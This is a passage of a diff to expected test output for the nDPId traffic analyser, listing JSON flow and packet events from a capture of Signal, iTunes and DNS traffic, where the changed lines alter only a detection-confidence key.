00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247593,"flow_last_seen":1569051247593,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1569051247593,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1569051247593,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1569051247593,"pkt":"xiwDYGpkxGGLNYKpCABFAABHd8wAAP8RvnbAqAIRwKgCAe15ADUAM\/YJyvgBAAABAAAAAAAABGU2NzMFZHNjZTkKYWthbWFpZWRnZQNuZXQAAAEAAQ=="} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247593,"flow_last_seen":1569051247593,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1569051247593,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e673.dsce9.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247593,"flow_last_seen":1569051247593,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1569051247593,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e673.dsce9.akamaiedge.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247594,"flow_last_seen":1569051247594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247594,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1569051247594,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051247594,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZHDAqAIRIuHwrcBKAbtArcPUAAAAALAC\/\/8kVgAAAgQFtAEDAwYBAQgKKFVNgQAAAAAEAgAA"} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247599,"flow_last_seen":1569051247599,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247599,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -17,41 +17,41 @@ 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051247603,"flow_last_seen":1569051247603,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051247603,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1569051247603,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051247603,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGZHDAqAIRIuHwrd69Abtt2McPAAAAALAC\/\/\/RCgAAAgQFtAEDAwcBAQgKKFVR8gAAAAAEAgAA"} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1569051247630,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":101,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":101,"pkt_l4_len":67,"thread_ts_msec":1569051247630,"pkt":"xGGLNYKpxiwDYGpkCABFAABXR+wAAEARrUfAqAIBwKgCEQA17XkAQwp5yviBgAABAAEAAAAABGU2NzMFZHNjZTkKYWthbWFpZWRnZQNuZXQAAAEAAcAMAAEAAQAAAA8ABBc5GBA="} -00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569051247593,"flow_last_seen":1569051247630,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569051247630,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e673.dsce9.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.57.24.16"}} +00786{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"signal.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569051247593,"flow_last_seen":1569051247630,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":59,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1569051247630,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":60793,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"e673.dsce9.akamaiedge.net","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.57.24.16"}} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1569051247643,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247643,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADQGlLoXORgQwKgCEQG73rrg+UqLaJ6n1qAScSCOEgAAAgQFrAQCCAqWTinBKFVR7gEDAwc="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1569051247645,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247645,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGSMLAqAIRFzkYEN66AbtonqfW4PlKjIAQBAspvwAAAQEICihVUhuWTinB"} -00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247599,"flow_last_seen":1569051247645,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247645,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00933{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247599,"flow_last_seen":1569051247690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247690,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247599,"flow_last_seen":1569051247645,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247645,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00933{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":13,"source":"signal.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247599,"flow_last_seen":1569051247690,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247690,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"23.57.24.16","src_port":57018,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"itunes.apple.com","ja3":"17305a56a62a10f6b0ee8edcc3b1769c","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1569051247704,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247704,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO0G93Mi4fCtwKgCEQG7wEr7fyfqQK3D1aASaN\/uCAAAAgQFrAQCCApkFVboKFVNgQEDAwg="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1569051247706,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247706,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrcBKAbtArcPV+38n64AQCBZ9JQAAAQEICihVTfNkFVbo"} -00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247594,"flow_last_seen":1569051247706,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1569051247706,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":22,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247594,"flow_last_seen":1569051247706,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1569051247706,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1569051247709,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247709,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO0G93Mi4fCtwKgCEQG73rtLEL7asq23cqASaN9\/CQAAAgQFrAQCCApkFVbqKFVR7wEDAwg="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1569051247711,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247711,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrd67AbuyrbdySxC+24AQBAsSOAAAAQEICihVUlpkFVbq"} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247600,"flow_last_seen":1569051247711,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247711,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247600,"flow_last_seen":1569051247711,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247711,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1569051247714,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247714,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO0G93Mi4fCtwKgCEQG73r1n96jrbdjHEKASaN+tQgAAAgQFrAQCCApkFVbrKFVR8gEDAwg="} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1569051247714,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051247714,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G9nMi4fCtwKgCEQG73rwJHv1\/xsFthKASaN+4LQAAAgQFrAQCCApkFVbrKFVR8AEDAwg="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1569051247716,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247716,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrd69Abtt2McQZ\/eo7IAQBAtAbwAAAQEICihVUl9kFVbr"} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247603,"flow_last_seen":1569051247716,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247716,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"signal.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247603,"flow_last_seen":1569051247716,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247716,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57021,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1569051247716,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051247716,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGZHzAqAIRIuHwrd68AbvGwW2ECR79gIAQBAtLWAAAAQEICihVUl9kFVbr"} -00906{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"signal.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051247601,"flow_last_seen":1569051247716,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051247716,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57020,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01033{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247594,"flow_last_seen":1569051247818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1637,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1569051247818,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01422{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":60,"source":"signal.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247594,"flow_last_seen":1569051247818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2666,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1569051247818,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":49226,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} -00962{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051247600,"flow_last_seen":1569051247822,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051247822,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01351{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":64,"source":"signal.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051247600,"flow_last_seen":1569051247822,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051247822,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"34.225.240.173","src_port":57019,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 